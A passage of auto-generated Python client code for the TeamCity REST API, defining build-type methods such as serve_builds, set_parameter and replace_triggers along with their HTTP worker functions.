    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, **kwargs)  # noqa: E501
def get_vcs_root_entry_checkout_rules(self, bt_locator, vcs_root_locator, **kwargs):  # noqa: E501
    """get_vcs_root_entry_checkout_rules  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_vcs_root_entry_checkout_rules(bt_locator, vcs_root_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str vcs_root_locator: (required)
    :return: str
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_vcs_root_entry_checkout_rules_with_http_info(bt_locator, vcs_root_locator, **kwargs)  # noqa: E501
def get_zipped(self, path, bt_locator, **kwargs):  # noqa: E501
    """get_zipped  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.get_zipped(path, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str path: (required)
    :param str bt_locator: (required)
    :param str base_path:
    :param str locator:
    :param str name:
    :param bool resolve_parameters:
    :return: None
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__get_zipped_with_http_info(path, bt_locator, **kwargs)  # noqa: E501
def remove_all_templates(self, bt_locator, **kwargs):  # noqa: E501
    """remove_all_templates  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.remove_all_templates(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param bool inline_settings:
    :return: None
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__remove_all_templates_with_http_info(bt_locator, **kwargs)  # noqa: E501
def remove_template(self, bt_locator, template_locator, **kwargs):  # noqa: E501
    """remove_template  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.remove_template(bt_locator, template_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str template_locator: (required)
    :param bool inline_settings:
    :return: None
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__remove_template_with_http_info(bt_locator, template_locator, **kwargs)  # noqa: E501
def replace_agent_requirement(self, bt_locator, agent_requirement_locator, **kwargs):  # noqa: E501
    """replace_agent_requirement  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.replace_agent_requirement(bt_locator, agent_requirement_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str agent_requirement_locator: (required)
    :param str fields:
    :param AgentRequirement body:
    :return: AgentRequirement
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__replace_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, **kwargs)  # noqa: E501
def replace_agent_requirements(self, bt_locator, **kwargs):  # noqa: E501
    """replace_agent_requirements  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.replace_agent_requirements(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :param AgentRequirements body:
    :return: AgentRequirements
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__replace_agent_requirements_with_http_info(bt_locator, **kwargs)  # noqa: E501
def replace_artifact_dep(self, bt_locator, artifact_dep_locator, **kwargs):  # noqa: E501
    """replace_artifact_dep  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.replace_artifact_dep(bt_locator, artifact_dep_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str artifact_dep_locator: (required)
    :param str fields:
    :param ArtifactDependency body:
    :return: ArtifactDependency
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__replace_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, **kwargs)  # noqa: E501
def replace_artifact_deps(self, bt_locator, **kwargs):  # noqa: E501
    """replace_artifact_deps  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.replace_artifact_deps(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :param ArtifactDependencies body:
    :return: ArtifactDependencies
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__replace_artifact_deps_with_http_info(bt_locator, **kwargs)  # noqa: E501
def replace_feature(self, bt_locator, feature_id, **kwargs):  # noqa: E501
    """replace_feature  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.replace_feature(bt_locator, feature_id, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str feature_id: (required)
    :param str fields:
    :param Feature body:
    :return: Feature
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__replace_feature_with_http_info(bt_locator, feature_id, **kwargs)  # noqa: E501
def replace_feature_parameters(self, bt_locator, feature_id, **kwargs):  # noqa: E501
    """replace_feature_parameters  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.replace_feature_parameters(bt_locator, feature_id, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str feature_id: (required)
    :param Properties body:
    :param str fields:
    :return: Properties
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__replace_feature_parameters_with_http_info(bt_locator, feature_id, **kwargs)  # noqa: E501
def replace_features(self, bt_locator, **kwargs):  # noqa: E501
    """replace_features  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.replace_features(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :param Features body:
    :return: Features
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__replace_features_with_http_info(bt_locator, **kwargs)  # noqa: E501
def replace_snapshot_dep(self, bt_locator, snapshot_dep_locator, **kwargs):  # noqa: E501
    """replace_snapshot_dep  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead of the result.

    >>> thread = api.replace_snapshot_dep(bt_locator, snapshot_dep_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str snapshot_dep_locator: (required)
    :param str fields:
    :param SnapshotDependency body:
    :return: SnapshotDependency
    """
    # Payload only; the delegate itself returns the request thread when
    # async_req is set, so one call covers both sync and async modes.
    kwargs['_return_http_data_only'] = True
    return self.__replace_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, **kwargs)  # noqa: E501
def replace_snapshot_deps(self, bt_locator, **kwargs):  # noqa: E501
    """replace_snapshot_deps  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.replace_snapshot_deps(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :param SnapshotDependencies body:
    :return: SnapshotDependencies
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__replace_snapshot_deps_with_http_info(bt_locator, **kwargs)  # noqa: E501
def replace_step(self, bt_locator, step_id, **kwargs):  # noqa: E501
    """replace_step  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.replace_step(bt_locator, step_id, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str step_id: (required)
    :param str fields:
    :param Step body:
    :return: Step
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__replace_step_with_http_info(bt_locator, step_id, **kwargs)  # noqa: E501
def replace_step_parameters(self, bt_locator, step_id, **kwargs):  # noqa: E501
    """replace_step_parameters  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.replace_step_parameters(bt_locator, step_id, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str step_id: (required)
    :param Properties body:
    :param str fields:
    :return: Properties
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__replace_step_parameters_with_http_info(bt_locator, step_id, **kwargs)  # noqa: E501
def replace_steps(self, bt_locator, **kwargs):  # noqa: E501
    """replace_steps  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.replace_steps(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :param Steps body:
    :return: Steps
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__replace_steps_with_http_info(bt_locator, **kwargs)  # noqa: E501
def replace_trigger(self, bt_locator, trigger_locator, **kwargs):  # noqa: E501
    """replace_trigger  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.replace_trigger(bt_locator, trigger_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str trigger_locator: (required)
    :param str fields:
    :param Trigger body:
    :return: Trigger
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__replace_trigger_with_http_info(bt_locator, trigger_locator, **kwargs)  # noqa: E501
def replace_triggers(self, bt_locator, **kwargs):  # noqa: E501
    """replace_triggers  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.replace_triggers(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :param Triggers body:
    :return: Triggers
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__replace_triggers_with_http_info(bt_locator, **kwargs)  # noqa: E501
def replace_vcs_root_entries(self, bt_locator, **kwargs):  # noqa: E501
    """replace_vcs_root_entries  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.replace_vcs_root_entries(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param VcsRootEntries body:
    :param str fields:
    :return: VcsRootEntries
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__replace_vcs_root_entries_with_http_info(bt_locator, **kwargs)  # noqa: E501
def serve_branches(self, bt_locator, **kwargs):  # noqa: E501
    """serve_branches  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.serve_branches(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str locator:
    :param str fields:
    :return: Branches
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__serve_branches_with_http_info(bt_locator, **kwargs)  # noqa: E501
def serve_build_field(self, bt_locator, build_locator, field, **kwargs):  # noqa: E501
    """serve_build_field  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.serve_build_field(bt_locator, build_locator, field, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str build_locator: (required)
    :param str field: (required)
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__serve_build_field_with_http_info(bt_locator, build_locator, field, **kwargs)  # noqa: E501
def serve_build_type_builds_tags(self, bt_locator, field, **kwargs):  # noqa: E501
    """serve_build_type_builds_tags  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.serve_build_type_builds_tags(bt_locator, field, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str field: (required)
    :return: Tags
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__serve_build_type_builds_tags_with_http_info(bt_locator, field, **kwargs)  # noqa: E501
def serve_build_type_field(self, bt_locator, field, **kwargs):  # noqa: E501
    """serve_build_type_field  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.serve_build_type_field(bt_locator, field, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str field: (required)
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__serve_build_type_field_with_http_info(bt_locator, field, **kwargs)  # noqa: E501
def serve_build_type_xml(self, bt_locator, **kwargs):  # noqa: E501
    """serve_build_type_xml  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.serve_build_type_xml(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :return: BuildType
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__serve_build_type_xml_with_http_info(bt_locator, **kwargs)  # noqa: E501
def serve_build_with_project(self, bt_locator, build_locator, **kwargs):  # noqa: E501
    """serve_build_with_project  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.serve_build_with_project(bt_locator, build_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str build_locator: (required)
    :param str fields:
    :return: Build
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__serve_build_with_project_with_http_info(bt_locator, build_locator, **kwargs)  # noqa: E501
def serve_builds(self, bt_locator, **kwargs):  # noqa: E501
    """serve_builds  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.serve_builds(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str status:
    :param str triggered_by_user:
    :param bool include_personal:
    :param bool include_canceled:
    :param bool only_pinned:
    :param list[str] tag:
    :param str agent_name:
    :param str since_build:
    :param str since_date:
    :param int start:
    :param int count:
    :param str locator:
    :param str fields:
    :return: Builds
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__serve_builds_with_http_info(bt_locator, **kwargs)  # noqa: E501
def set_build_type_field(self, bt_locator, field, **kwargs):  # noqa: E501
    """set_build_type_field  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.set_build_type_field(bt_locator, field, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str field: (required)
    :param str body:
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__set_build_type_field_with_http_info(bt_locator, field, **kwargs)  # noqa: E501
def set_parameter(self, bt_locator, **kwargs):  # noqa: E501
    """set_parameter  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.set_parameter(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param ModelProperty body:
    :param str fields:
    :return: ModelProperty
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__set_parameter_with_http_info(bt_locator, **kwargs)  # noqa: E501
def set_parameter_0(self, name, bt_locator, **kwargs):  # noqa: E501
    """set_parameter_0  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.set_parameter_0(name, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str name: (required)
    :param str bt_locator: (required)
    :param ModelProperty body:
    :param str fields:
    :return: ModelProperty
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__set_parameter_0_with_http_info(name, bt_locator, **kwargs)  # noqa: E501
def set_parameter_1(self, bt_locator, **kwargs):  # noqa: E501
    """set_parameter_1  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.set_parameter_1(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param ModelProperty body:
    :param str fields:
    :return: ModelProperty
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__set_parameter_1_with_http_info(bt_locator, **kwargs)  # noqa: E501
def set_parameter_2(self, name, bt_locator, **kwargs):  # noqa: E501
    """set_parameter_2  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.set_parameter_2(name, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str name: (required)
    :param str bt_locator: (required)
    :param ModelProperty body:
    :param str fields:
    :return: ModelProperty
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__set_parameter_2_with_http_info(name, bt_locator, **kwargs)  # noqa: E501
def set_parameter_type(self, name, bt_locator, **kwargs):  # noqa: E501
    """set_parameter_type  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.set_parameter_type(name, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str name: (required)
    :param str bt_locator: (required)
    :param Type body:
    :return: Type
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__set_parameter_type_with_http_info(name, bt_locator, **kwargs)  # noqa: E501
def set_parameter_type_raw_value(self, name, bt_locator, **kwargs):  # noqa: E501
    """set_parameter_type_raw_value  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.set_parameter_type_raw_value(name, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str name: (required)
    :param str bt_locator: (required)
    :param str body:
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__set_parameter_type_raw_value_with_http_info(name, bt_locator, **kwargs)  # noqa: E501
def set_parameter_value_long(self, name, bt_locator, **kwargs):  # noqa: E501
    """set_parameter_value_long  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.set_parameter_value_long(name, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str name: (required)
    :param str bt_locator: (required)
    :param str body:
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__set_parameter_value_long_with_http_info(name, bt_locator, **kwargs)  # noqa: E501
def set_parameter_value_long_0(self, name, bt_locator, **kwargs):  # noqa: E501
    """set_parameter_value_long_0  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.set_parameter_value_long_0(name, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str name: (required)
    :param str bt_locator: (required)
    :param str body:
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__set_parameter_value_long_0_with_http_info(name, bt_locator, **kwargs)  # noqa: E501
def set_parameters(self, bt_locator, **kwargs):  # noqa: E501
    """set_parameters  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.set_parameters(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param Properties body:
    :param str fields:
    :return: Properties
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__set_parameters_with_http_info(bt_locator, **kwargs)  # noqa: E501
def set_parameters_0(self, bt_locator, **kwargs):  # noqa: E501
    """set_parameters_0  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.set_parameters_0(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param Properties body:
    :param str fields:
    :return: Properties
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__set_parameters_0_with_http_info(bt_locator, **kwargs)  # noqa: E501
def set_templates(self, bt_locator, **kwargs):  # noqa: E501
    """set_templates  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.set_templates(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param BuildTypes body:
    :param bool optimize_settings:
    :param str fields:
    :return: BuildTypes
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__set_templates_with_http_info(bt_locator, **kwargs)  # noqa: E501
def set_vcs_labeling_options(self, bt_locator, **kwargs):  # noqa: E501
    """set_vcs_labeling_options  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.set_vcs_labeling_options(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param VcsLabeling body:
    :return: VcsLabeling
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__set_vcs_labeling_options_with_http_info(bt_locator, **kwargs)  # noqa: E501
def update_vcs_root_entry(self, bt_locator, vcs_root_locator, **kwargs):  # noqa: E501
    """update_vcs_root_entry  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.update_vcs_root_entry(bt_locator, vcs_root_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str vcs_root_locator: (required)
    :param VcsRootEntry body:
    :param str fields:
    :return: VcsRootEntry
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__update_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, **kwargs)  # noqa: E501
def update_vcs_root_entry_checkout_rules(self, bt_locator, vcs_root_locator, **kwargs):  # noqa: E501
    """update_vcs_root_entry_checkout_rules  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.

    >>> thread = api.update_vcs_root_entry_checkout_rules(bt_locator, vcs_root_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str vcs_root_locator: (required)
    :param str body:
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the HTTP response down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # Single delegation covers both the async (thread) and sync (data) cases.
    return self.__update_vcs_root_entry_checkout_rules_with_http_info(bt_locator, vcs_root_locator, **kwargs)  # noqa: E501
def __add_agent_requirement_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """add_agent_requirement  # noqa: E501

    Worker behind ``add_agent_requirement``: validates arguments and
    performs the HTTP call via the shared API client.

    >>> thread = api.__add_agent_requirement_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :param AgentRequirement body:
    :return: AgentRequirement
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameters plus the standard transport-control flags.
    all_params = [
        'bt_locator', 'fields', 'body',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]  # noqa: E501
    params = {'bt_locator': bt_locator}
    for key, val in six.iteritems(kwargs):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_agent_requirement" % key
            )
        params[key] = val
    # verify the required parameter 'bt_locator' is set
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `add_agent_requirement`")  # noqa: E501
    collection_formats = {}
    # A TeamCityObject may be given in place of a locator string; use its id.
    locator = params['bt_locator']
    path_params = {
        'btLocator': locator.locator_id if isinstance(locator, TeamCityObject) else locator,  # noqa: E501
    }
    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/agent-requirements', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='AgentRequirement',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __add_artifact_dep_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """add_artifact_dep  # noqa: E501

    Worker behind ``add_artifact_dep``: validates arguments and performs
    the HTTP call via the shared API client.

    >>> thread = api.__add_artifact_dep_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :param ArtifactDependency body:
    :return: ArtifactDependency
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameters plus the standard transport-control flags.
    all_params = [
        'bt_locator', 'fields', 'body',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]  # noqa: E501
    params = {'bt_locator': bt_locator}
    for key, val in six.iteritems(kwargs):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_artifact_dep" % key
            )
        params[key] = val
    # verify the required parameter 'bt_locator' is set
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `add_artifact_dep`")  # noqa: E501
    collection_formats = {}
    # A TeamCityObject may be given in place of a locator string; use its id.
    locator = params['bt_locator']
    path_params = {
